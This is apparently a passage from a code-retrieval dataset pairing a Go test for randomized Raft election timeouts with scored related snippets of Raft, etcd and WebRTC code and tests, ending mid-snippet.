rf.voteFor: %d, \" +\n\t\t\"reply: %v\", rf.me, args.CandidatedId, args.Term, args.LastLogIndex, args.LastLogTerm, rf.log, rf.voteFor, reply)\n\t// Your code here (2A, 2B).\n\trf.resetElectionTimer()\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\tlastLogIndex := rf.log[len(rf.log)-1].Index\n\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\tif lastLogTerm > args.LastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t// 5.1 Reply false if term < currentTerm\n\tif args.Term < rf.currentTerm {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\tif (args.Term == rf.currentTerm && rf.state == \"leader\") || (args.Term == rf.currentTerm && rf.voteFor != -1){\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm && rf.voteFor == args.CandidatedId {\n\t\treply.VoteGranted = true\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t// Rules for Servers\n\t// All Servers\n\t// If RPC request or response contains term T > currentTerm: set currentTerm = T, convert to follower\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.voteFor = -1\n\t\trf.mu.Unlock()\n\t\trf.changeState(\"follower\")\n\t\trf.mu.Lock()\n\t}\n\n\trf.voteFor = args.CandidatedId\n\treply.VoteGranted = true\n\t//rf.persist()\n\trf.mu.Unlock()\n\treturn\n}", "func (handler *RuleHandler) FollowerOnRequestVote(msg iface.MsgRequestVote, log iface.RaftLog, status iface.Status) []interface{} {\n\tactions := []interface{}{}\n\n\t// reject if we recently heard from leader\n\t// (to avoid \"disruptive servers\" during cluster configuration change)\n\tif time.Now().Sub(status.LeaderLastHeard()) < status.MinElectionTimeout() {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// maybe we are outdated\n\tif msg.Term > status.CurrentTerm() {\n\t\tactions = append(actions, iface.ActionSetCurrentTerm{\n\t\t\tNewCurrentTerm: msg.Term,\n\t\t})\n\t}\n\n\t// if candidate is still in a previous term, reject vote\n\tif msg.Term < status.CurrentTerm() {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t})\n\t\treturn actions\n\t}\n\n\t// reject vote if we voted on another peer already\n\tif status.VotedFor() != \"\" && status.VotedFor() != msg.CandidateAddress {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: false,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t\tAddress: status.NodeAddress(),\n\t\t})\n\t\treturn actions\n\t}\n\n\tlastEntry, _ := log.Get(log.LastIndex())\n\n\t// if we have no log, surely peer is at least as updated as us. so grant vote\n\tif lastEntry == nil {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: true,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t\tAddress: status.NodeAddress(),\n\t\t})\n\t\tactions = append(actions, iface.ActionSetVotedFor{\n\t\t\tNewVotedFor: msg.CandidateAddress,\n\t\t})\n\t\treturn actions\n\t}\n\n\t// ok, we have log. grant vote if peer is as updated as us\n\tif msg.LastLogTerm > lastEntry.Term || (msg.LastLogTerm == lastEntry.Term && msg.LastLogIndex >= log.LastIndex()) {\n\t\tactions = append(actions, iface.ReplyRequestVote{\n\t\t\tVoteGranted: true,\n\t\t\tTerm: status.CurrentTerm(),\n\t\t\tAddress: status.NodeAddress(),\n\t\t})\n\t\tactions = append(actions, iface.ActionSetVotedFor{\n\t\t\tNewVotedFor: msg.CandidateAddress,\n\t\t})\n\t\treturn actions\n\t}\n\n\t// ok, peer is not as updated as us\n\tactions = append(actions, iface.ReplyRequestVote{\n\t\tVoteGranted: false,\n\t\tTerm: status.CurrentTerm(),\n\t\tAddress: status.NodeAddress(),\n\t})\n\treturn actions\n\n}", "func TestProposeAfterRemoveLeader(t *testing.T) {\n\tctx, cancel := context.WithCancel(context.Background())\n\tdefer cancel()\n\n\tmn := newMultiNode(1)\n\tgo mn.run()\n\tdefer mn.Stop()\n\n\tstorage := NewMemoryStorage()\n\tif err := mn.CreateGroup(1, newTestConfig(1, nil, 10, 1, storage),\n\t\t[]Peer{{ID: 1}}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := mn.Campaign(ctx, 1); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tif err := mn.ProposeConfChange(ctx, 1, raftpb.ConfChange{\n\t\tType: raftpb.ConfChangeRemoveNode,\n\t\tNodeID: 1,\n\t}); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tgs := <-mn.Ready()\n\tg := gs[1]\n\tif err := storage.Append(g.Entries); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tfor _, e := range g.CommittedEntries {\n\t\tif e.Type == raftpb.EntryConfChange {\n\t\t\tvar cc raftpb.ConfChange\n\t\t\tif err := cc.Unmarshal(e.Data); err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t\tmn.ApplyConfChange(1, cc)\n\t\t}\n\t}\n\tmn.Advance(gs)\n\n\tif err := mn.Propose(ctx, 1, []byte(\"somedata\")); err != nil {\n\t\tt.Errorf(\"err = %v, want nil\", err)\n\t}\n}", "func TestInvalidFingerprintCausesFailed(t *testing.T) {\n\treport := test.CheckRoutines(t)\n\tdefer report()\n\n\tpcOffer, err := NewPeerConnection(Configuration{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tpcAnswer, err := NewPeerConnection(Configuration{})\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tdefer closePairNow(t, pcOffer, pcAnswer)\n\n\tofferChan := make(chan SessionDescription)\n\tpcOffer.OnICECandidate(func(candidate *ICECandidate) {\n\t\tif candidate == nil {\n\t\t\tofferChan <- *pcOffer.PendingLocalDescription()\n\t\t}\n\t})\n\n\tconnectionHasFailed, closeFunc := context.WithCancel(context.Background())\n\tpcAnswer.OnConnectionStateChange(func(connectionState PeerConnectionState) {\n\t\tif connectionState == PeerConnectionStateFailed {\n\t\t\tcloseFunc()\n\t\t}\n\t})\n\n\tif _, err = pcOffer.CreateDataChannel(\"unusedDataChannel\", nil); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\toffer, err := pcOffer.CreateOffer(nil)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t} else if err := pcOffer.SetLocalDescription(offer); err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\tselect {\n\tcase offer := <-offerChan:\n\t\t// Replace with invalid fingerprint\n\t\tre := regexp.MustCompile(`sha-256 (.*?)\\r`)\n\t\toffer.SDP = re.ReplaceAllString(offer.SDP, \"sha-256 AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:AA\\r\")\n\n\t\tif err := pcAnswer.SetRemoteDescription(offer); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tanswer, err := pcAnswer.CreateAnswer(nil)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\tif err = pcAnswer.SetLocalDescription(answer); err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\n\t\terr = pcOffer.SetRemoteDescription(answer)\n\t\tif err != nil {\n\t\t\tt.Fatal(err)\n\t\t}\n\tcase <-time.After(5 * time.Second):\n\t\tt.Fatal(\"timed out waiting to receive offer\")\n\t}\n\n\tselect {\n\tcase <-connectionHasFailed.Done():\n\tcase <-time.After(30 * time.Second):\n\t\tt.Fatal(\"timed out waiting for connection to fail\")\n\t}\n}" ]
[ "0.6167525", "0.6163571", "0.58222115", "0.57729566", "0.5765619", "0.57036155", "0.5693399", "0.5582176", "0.55365545", "0.54777724", "0.5464581", "0.539433", "0.5368451", "0.53509605", "0.5331513", "0.53258264", "0.5297152", "0.5295841", "0.5238286", "0.52340853", "0.52311385", "0.5230153", "0.520273", "0.51859516", "0.5178421", "0.5178062", "0.51750636", "0.51526386", "0.51389277", "0.5119948", "0.511672", "0.5112103", "0.510339", "0.50490415", "0.50116616", "0.49919334", "0.49670836", "0.4962082", "0.49525025", "0.4949893", "0.494038", "0.49351725", "0.49295452", "0.491719", "0.4915782", "0.49096256", "0.48830304", "0.4873353", "0.48588017", "0.48478782", "0.48417023", "0.48404282", "0.48389015", "0.4832124", "0.48318967", "0.48305342", "0.4825337", "0.48220256", "0.48064598", "0.48003745", "0.47988492", "0.4783928", "0.47759232", "0.47670627", "0.4766371", "0.4763464", "0.47629488", "0.4759926", "0.4759905", "0.4759164", "0.4744981", "0.47411403", "0.47358334", "0.4731543", "0.4731167", "0.47166663", "0.47152546", "0.47082564", "0.46807316", "0.46795747", "0.46715182", "0.46714208", "0.46690083", "0.46664906", "0.46662304", "0.46606556", "0.46532926", "0.4638353", "0.4637346", "0.46366405", "0.46226096", "0.46094242", "0.46083313", "0.4607361", "0.46058822", "0.46052533", "0.46050334", "0.46014664", "0.46007103", "0.45937756" ]
0.77985966
0
testNonleaderElectionTimeoutRandomized tests that election timeout for follower or candidate is randomized. Reference: section 5.2
func testNonleaderElectionTimeoutRandomized(t *testing.T, state StateType) { et := 10 r := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage()) defer closeAndFreeRaft(r) timeouts := make(map[int]bool) for round := 0; round < 50*et; round++ { switch state { case StateFollower: r.becomeFollower(r.Term+1, 2) case StateCandidate: r.becomeCandidate() } time := 0 for len(r.readMessages()) == 0 { r.tick() time++ } timeouts[time] = true } for d := et + 1; d < 2*et; d++ { if !timeouts[d] { t.Errorf("timeout in %d ticks should happen", d) } } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (node *Node) randElectionTimeout() time.Duration {\n\treturn time.Duration(150+rand.Intn(150)) * time.Millisecond\n}", "func TestLearnerElectionTimeout(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\t// n2 is learner. Learner should not start election even when times out.\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n}", "func electionTimeout() int64 {\n\treturn int64(rand.Intn(MAXELECTIMEOUT- MINELECTIMEOUT) + MINELECTIMEOUT)\n}", "func setRandomizedElectionTimeout(r *raft, v int) {\n\tr.randomizedElectionTimeout = v\n}", "func testNonleadersElectionTimeoutNonconflict(t *testing.T, state StateType) {\n\tet := 10\n\tsize := 5\n\trs := make([]*raft, size)\n\tids := idsBySize(size)\n\tfor k := range rs {\n\t\trs[k] = newTestRaft(ids[k], ids, et, 1, NewMemoryStorage())\n\t}\n\tdefer func() {\n\t\tfor k := range rs {\n\t\t\tcloseAndFreeRaft(rs[k])\n\t\t}\n\t}()\n\tconflicts := 0\n\tfor round := 0; round < 1000; round++ {\n\t\tfor _, r := range rs {\n\t\t\tswitch state {\n\t\t\tcase StateFollower:\n\t\t\t\tr.becomeFollower(r.Term+1, None)\n\t\t\tcase StateCandidate:\n\t\t\t\tr.becomeCandidate()\n\t\t\t}\n\t\t}\n\n\t\ttimeoutNum := 0\n\t\tfor timeoutNum == 0 {\n\t\t\tfor _, r := range rs {\n\t\t\t\tr.tick()\n\t\t\t\tif len(r.readMessages()) > 0 {\n\t\t\t\t\ttimeoutNum++\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\t// several rafts time out at the same tick\n\t\tif timeoutNum > 1 {\n\t\t\tconflicts++\n\t\t}\n\t}\n\n\tif g := float64(conflicts) / 1000; g > 0.3 {\n\t\tt.Errorf(\"probability of conflicts = %v, want <= 0.3\", g)\n\t}\n}", "func GetRandomElectionTimeout() time.Duration {\n\treturn time.Duration(minElectionTimeout+rand.Intn(maxElectionTimeout-minElectionTimeout)) * time.Millisecond\n}", "func getElectionTimeout() time.Duration {\n\treturn time.Duration(rand.Intn(300) + 150)\n}", "func (rf *Raft) resetElectionTimeout() time.Duration {\n\trand.Seed(time.Now().UTC().UnixNano())\n\trf.randomizedElectionTimeout = rf.electionTimeout + time.Duration(rand.Int63n(rf.electionTimeout.Nanoseconds()))\n\treturn rf.randomizedElectionTimeout\n}", "func (rf *Raft) resetElectionTimeout() {\n\trf.electionTimeoutStartTime = time.Now()\n\t// randomize election timeout, 300~400ms\n\trf.electionTimeoutInterval = time.Duration(time.Millisecond * time.Duration(500+rand.Intn(300)))\n}", "func TestClock_AfterElectionTimeout(t *testing.T) {\n\tc := raft.NewClock()\n\tc.ElectionTimeout = 10 * time.Millisecond\n\tt0 := time.Now()\n\t<-c.AfterElectionTimeout()\n\tif d := time.Since(t0); d < c.ElectionTimeout {\n\t\tt.Fatalf(\"channel fired too soon: %v\", d)\n\t}\n}", "func generateElectionTime() int {\n rand.Seed(time.Now().UnixNano())\n return rand.Intn(150)*2 + 300\n}", "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func Test_Unstable_RGIT_TestConsistentWhenRandomNodeStopMultiTimes(t *testing.T) {\n\n\tfullMessages := make([]string, 0)\n\tstopTimes := 30\n\n\ttestInitAllDataFolder(\"TestRGIT_TestConsistentWhenLeaderChangeMultiTimes\")\n\traftGroupNodes := testCreateThreeNodes(t, 20*1024*1024)\n\tdefer func() {\n\t\ttestDestroyRaftGroups(raftGroupNodes)\n\t}()\n\tproposeMessages := testCreateMessages(t, 100)\n\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\tfullMessages = append(fullMessages, proposeMessages...)\n\n\tfor i := 0; i < stopTimes; i++ {\n\t\tstopNodeIndex := rand.Intn(3)\n\t\tmemberID := raftGroupNodes[stopNodeIndex].Membership.GetSelfMemberID()\n\t\tif raftGroupNodes[stopNodeIndex].IsLeader() {\n\t\t\tfmt.Println(\"stop leader \", memberID)\n\t\t} else {\n\t\t\tfmt.Println(\"stop node \", memberID)\n\t\t}\n\t\traftGroupNodes[stopNodeIndex].Stop()\n\n\t\t// append again\n\t\tproposeMessages = testCreateMessages(t, 100)\n\t\ttestDoProposeDataAndWait(t, raftGroupNodes, proposeMessages)\n\n\t\tfullMessages = append(fullMessages, proposeMessages...)\n\n\t\tfmt.Println(\"start node \", memberID)\n\t\traftGroupNodes[stopNodeIndex].Start()\n\t}\n\n\t// 5s is enough to process raft group\n\ttime.Sleep(5 * time.Second)\n\ttestDoCheckData(t, fullMessages, raftGroupNodes, 1024*100, false)\n}", "func runElectionTimeoutThread(\n\ttimeSinceLastUpdate * time.Time,\n\tisElection * bool,\n\tstate * ServerState,\n\tvoteChannels *[8]chan Vote,\n\tonWinChannel * chan bool,\n\telectionThreadSleepTime time.Duration,\n) {\n\tfor {\n\t\ttimeElapsed := time.Now().Sub(*timeSinceLastUpdate)\n\t\tif timeElapsed.Milliseconds() > ElectionTimeOut { //implements C4.\n\t\t\t*isElection = true // restarts election\n\t\t}\n\n\t\tif *isElection {\n\t\t\t*timeSinceLastUpdate = time.Now()\n\t\t\tgo elect(state, voteChannels, *onWinChannel)\n\t\t}\n\n\t\ttime.Sleep(electionThreadSleepTime)\n\t}\n}", "func randomTimeout(minVal, maxVal time.Duration) <-chan time.Time {\n\textra := time.Duration(rand.Int()) % maxVal\n\treturn time.After((minVal + extra) % maxVal)\n}", "func (c *Clock) AfterElectionTimeout() <-chan chan struct{} {\n\td := c.ElectionTimeout + time.Duration(rand.Intn(int(c.ElectionTimeout)))\n\treturn newClockChan(d)\n}", "func (s *BrokerSuite) TestDialRandomized(c *C) {\n\tsrv1 := NewServer()\n\tsrv1.Start()\n\tdefer srv1.Close()\n\n\tsrv2 := NewServer()\n\tsrv2.Start()\n\tdefer srv2.Close()\n\n\tsrv3 := NewServer()\n\tsrv3.Start()\n\tdefer srv3.Close()\n\n\tnodes := []string{srv1.Address(), srv2.Address(), srv3.Address()}\n\tconf := s.newTestBrokerConf(\"tester\")\n\n\tfor i := 0; i < 30; i++ {\n\t\t_, err := NewCluster(nodes, conf.ClusterConnectionConf)\n\t\tc.Assert(err, IsNil)\n\t}\n\n\tc.Assert(srv1.Processed, Not(Equals), 30)\n\tc.Assert(srv2.Processed, Not(Equals), 30)\n\tc.Assert(srv3.Processed, Not(Equals), 30)\n\tc.Assert(srv1.Processed+srv2.Processed+srv3.Processed, Equals, 30)\n\tc.Assert(srv1.Processed, Not(Equals), 0)\n\tc.Assert(srv2.Processed, Not(Equals), 0)\n\tc.Assert(srv3.Processed, Not(Equals), 0)\n}", "func Test_TaskOption_LeadershipTimeout(t *testing.T) {\n\t// given\n\toption := crontask.LeadershipTimeout(time.Second)\n\toptions := &crontask.TaskOptions{LeadershipTimeout: time.Hour}\n\n\t// when\n\toption(options)\n\n\t// then\n\tif options.LeadershipTimeout != time.Second {\n\t\tt.Errorf(\"leadership timeout not correctly applied, got %s\", options.LeadershipTimeout)\n\t}\n}", "func randomTimeOut() time.Duration {\n\tt := time.Duration(rand.Intn(150)+150) * time.Millisecond // rand [150,300) ms to time out\n\treturn t\n}", "func (s *DockerSuite) TestWaitNonBlockedExitRandom(c *check.C) {\n\tout, _ := dockerCmd(c, \"run\", \"-d\", \"busybox\", \"sh\", \"-c\", \"exit 99\")\n\tcontainerID := strings.TrimSpace(out)\n\n\terr := waitInspect(containerID, \"{{.State.Running}}\", \"false\", 30*time.Second)\n\tc.Assert(err, checker.IsNil) //Container should have stopped by now\n\tout, _ = dockerCmd(c, \"wait\", containerID)\n\tc.Assert(strings.TrimSpace(out), checker.Equals, \"99\", check.Commentf(\"failed to set up container, %v\", out))\n\n}", "func TestLeaderElectionInOneRoundRPC(t *testing.T) {\n\ttests := []struct {\n\t\tsize int\n\t\tvotes map[uint64]bool\n\t\tstate StateType\n\t}{\n\t\t// win the election when receiving votes from a majority of the servers\n\t\t{1, map[uint64]bool{}, StateLeader},\n\t\t{3, map[uint64]bool{2: true, 3: true}, StateLeader},\n\t\t{3, map[uint64]bool{2: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true, 5: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true, 4: true}, StateLeader},\n\t\t{5, map[uint64]bool{2: true, 3: true}, StateLeader},\n\n\t\t// return to follower state if it receives vote denial from a majority\n\t\t{3, map[uint64]bool{2: false, 3: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: false, 3: false, 4: false, 5: false}, StateFollower},\n\t\t{5, map[uint64]bool{2: true, 3: false, 4: false, 5: false}, StateFollower},\n\n\t\t// stay in candidate if it does not obtain the majority\n\t\t{3, map[uint64]bool{}, StateCandidate},\n\t\t{5, map[uint64]bool{2: true}, StateCandidate},\n\t\t{5, map[uint64]bool{2: false, 3: false}, StateCandidate},\n\t\t{5, map[uint64]bool{}, StateCandidate},\n\t}\n\tfor i, tt := range tests {\n\t\tr := newTestRaft(1, idsBySize(tt.size), 10, 1, NewMemoryStorage())\n\t\tdefer closeAndFreeRaft(r)\n\n\t\tr.Step(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\t\tfor id, vote := range tt.votes {\n\t\t\tr.Step(pb.Message{From: id, To: 1, Term: r.Term, Type: pb.MsgVoteResp, Reject: !vote})\n\t\t}\n\n\t\tif r.state != tt.state {\n\t\t\tt.Errorf(\"#%d: state = %s, want %s\", i, r.state, tt.state)\n\t\t}\n\t\tif g := r.Term; g != 1 {\n\t\t\tt.Errorf(\"#%d: term = %d, want %d\", i, g, 1)\n\t\t}\n\t}\n}", "func TestTimeout(t *testing.T) {\n\tgo func() {\n\t\ttime.Sleep(10 * time.Second)\n\t\tt.Fatal()\n\t}()\n\n\tpub, sub := testClients(t, 500*time.Millisecond)\n\trequire.Nil(t, sub.Subscribe(\"timeoutTestChannel\").Err)\n\n\tr := sub.Receive() // should timeout after a second\n\tassert.Equal(t, Error, r.Type)\n\tassert.NotNil(t, r.Err)\n\tassert.True(t, r.Timeout())\n\n\twaitCh := make(chan struct{})\n\tgo func() {\n\t\tr = sub.Receive()\n\t\tclose(waitCh)\n\t}()\n\trequire.Nil(t, pub.Cmd(\"PUBLISH\", \"timeoutTestChannel\", \"foo\").Err)\n\t<-waitCh\n\n\tassert.Equal(t, Message, r.Type)\n\tassert.Equal(t, \"timeoutTestChannel\", r.Channel)\n\tassert.Equal(t, \"foo\", r.Message)\n\tassert.Nil(t, r.Err, \"%s\", r.Err)\n\tassert.False(t, r.Timeout())\n}", "func TestRetryTimerWithNoJitter(t *testing.T) {\n\tdoneCh := make(chan struct{})\n\t// No jitter\n\tattemptCh := newRetryTimerWithJitter(time.Millisecond, 5*time.Millisecond, NoJitter, doneCh)\n\ti := <-attemptCh\n\tif i != 0 {\n\t\tclose(doneCh)\n\t\tt.Fatalf(\"Invalid attempt counter returned should be 0, found %d instead\", i)\n\t}\n\t// Loop through the maximum possible attempt.\n\tfor i = range attemptCh {\n\t\tif i == 30 {\n\t\t\tclose(doneCh)\n\t\t}\n\t}\n\t_, ok := <-attemptCh\n\tif ok {\n\t\tt.Fatal(\"Attempt counter should be closed\")\n\t}\n}", "func TestErrorTimeout(t *testing.T) {\n\ttimeout = true\n\tgo createServer()\n\tcreateUser()\n\tloginClient()\n}", "func TestReductionTimeout(t *testing.T) {\n\teb, _, streamer, _, _ := launchReductionTest(true, 2)\n\n\t// send a hash to start reduction\n\thash, _ := crypto.RandEntropy(32)\n\n\t// Because round updates are asynchronous (sent through a channel), we wait\n\t// for a bit to let the broker update its round.\n\ttime.Sleep(200 * time.Millisecond)\n\tsendSelection(1, hash, eb)\n\n\ttimer := time.After(1 * time.Second)\n\t<-timer\n\n\tstopChan := make(chan struct{})\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tseenTopics := streamer.SeenTopics()\n\t\tfor _, topic := range seenTopics {\n\t\t\tif topic == topics.Agreement {\n\t\t\t\tt.Fatal(\"\")\n\t\t\t}\n\t\t}\n\n\t\tstopChan <- struct{}{}\n\t})\n\n\t<-stopChan\n}", "func TestFreeStuckCandidateWithCheckQuorum(t *testing.T) {\n\ta := newTestRaft(1, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tb := newTestRaft(2, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tc := newTestRaft(3, []uint64{1, 2, 3}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(a)\n\tdefer closeAndFreeRaft(b)\n\tdefer closeAndFreeRaft(c)\n\n\ta.checkQuorum = true\n\tb.checkQuorum = true\n\tc.checkQuorum = true\n\n\tnt := newNetwork(a, b, c)\n\tsetRandomizedElectionTimeout(b, b.electionTimeout+1)\n\n\tfor i := 0; i < b.electionTimeout; i++ {\n\t\tb.tick()\n\t}\n\tnt.send(pb.Message{From: 1, To: 1, Type: pb.MsgHup})\n\n\tnt.isolate(1)\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+1 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+1)\n\t}\n\n\t// Vote again for safety\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif b.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", b.state, StateFollower)\n\t}\n\n\tif c.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", c.state, StateCandidate)\n\t}\n\n\tif c.Term != b.Term+2 {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, b.Term+2)\n\t}\n\n\tnt.recover()\n\tnt.send(pb.Message{From: 1, To: 3, Type: pb.MsgHeartbeat, Term: a.Term})\n\n\t// Disrupt the leader so that the stuck peer is freed\n\tif a.state != StateFollower {\n\t\tt.Errorf(\"state = %s, want %s\", a.state, StateFollower)\n\t}\n\n\tif c.Term != a.Term {\n\t\tt.Errorf(\"term = %d, want %d\", c.Term, a.Term)\n\t}\n\n\t// Vote again, should become leader this time\n\tnt.send(pb.Message{From: 3, To: 3, Type: pb.MsgHup})\n\n\tif c.state != StateLeader {\n\t\tt.Errorf(\"peer 3 state: %s, want %s\", c.state, StateLeader)\n\t}\n\n}", "func TestSelectVoterMaxVarious(t *testing.T) {\n\thash := 0\n\tfor minMaxRate := 1; minMaxRate <= 100000000; minMaxRate *= 10000 {\n\t\tt.Logf(\"<<< min: 100, max: %d >>>\", 100*minMaxRate)\n\t\tfor validators := 16; validators <= 256; validators *= 4 {\n\t\t\tfor voters := 1; voters <= validators; voters += 10 {\n\t\t\t\tvalSet, _ := randValidatorSetWithMinMax(PrivKeyEd25519, validators, 100, 100*int64(minMaxRate))\n\t\t\t\tvoterSet := SelectVoter(valSet, []byte{byte(hash)}, &VoterParams{int32(voters), 20})\n\t\t\t\tif voterSet.Size() < voters {\n\t\t\t\t\tt.Logf(\"Cannot elect voters up to MaxVoters: validators=%d, MaxVoters=%d, actual voters=%d\",\n\t\t\t\t\t\tvalidators, voters, voterSet.Size())\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\thash++\n\t\t\t}\n\t\t}\n\t}\n}", "func TestKillRandom(t *testing.T) {\n\tprocAttr := new(os.ProcAttr)\n\tprocAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}\n\n\tclusterSize := 9\n\targGroup, etcds, err := createCluster(clusterSize, procAttr, false)\n\n\tif err != nil {\n\t\tt.Fatal(\"cannot create cluster\")\n\t}\n\n\tdefer destroyCluster(etcds)\n\n\tleaderChan := make(chan string, 1)\n\n\ttime.Sleep(3 * time.Second)\n\n\tgo leaderMonitor(clusterSize, 4, leaderChan)\n\n\ttoKill := make(map[int]bool)\n\n\tfor i := 0; i < 20; i++ {\n\t\tfmt.Printf(\"TestKillRandom Round[%d/20]\\n\", i)\n\n\t\tj := 0\n\t\tfor {\n\n\t\t\tr := rand.Int31n(9)\n\t\t\tif _, ok := toKill[int(r)]; !ok {\n\t\t\t\tj++\n\t\t\t\ttoKill[int(r)] = true\n\t\t\t}\n\n\t\t\tif j > 3 {\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t}\n\n\t\tfor num, _ := range toKill {\n\t\t\tetcds[num].Kill()\n\t\t\tetcds[num].Release()\n\t\t}\n\n\t\t<-leaderChan\n\n\t\tfor num, _ := range toKill {\n\t\t\tetcds[num], err = os.StartProcess(\"etcd\", argGroup[num], procAttr)\n\t\t}\n\n\t\ttoKill = make(map[int]bool)\n\t}\n\n\t<-leaderChan\n\n}", "func TestTimeout(t *testing.T) {\n\tserver := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\ttime.Sleep(5 * time.Second)\n\t}))\n\tclient := SearchClient{allowedAccessToken, server.URL}\n\tdefer server.Close()\n\n\t_, err := client.FindUsers(SearchRequest{})\n\n\tif err == nil {\n\t\tt.Errorf(\"empty error, must be timeout error\")\n\t} else if !strings.Contains(err.Error(), \"timeout for\") {\n\t\tt.Errorf(\"unexpected error: %v\", err.Error())\n\t}\n}", "func TestDvLIRClient_NTPServerTest(t *testing.T) {\n\tip := viper.GetString(\"IPAddress\")\n\tpw := viper.GetString(\"Password\")\n\n\tdvlirClient, err := NewDvLIRClient(ip, pw)\n\tif !assert.NoError(t, err, \"Error while creating Api client\") {\n\t\treturn\n\t}\n\n\terr = dvlirClient.Login()\n\tif !assert.NoError(t, err, \"Error during Login\") {\n\t\treturn\n\t}\n\n\tcode, err := 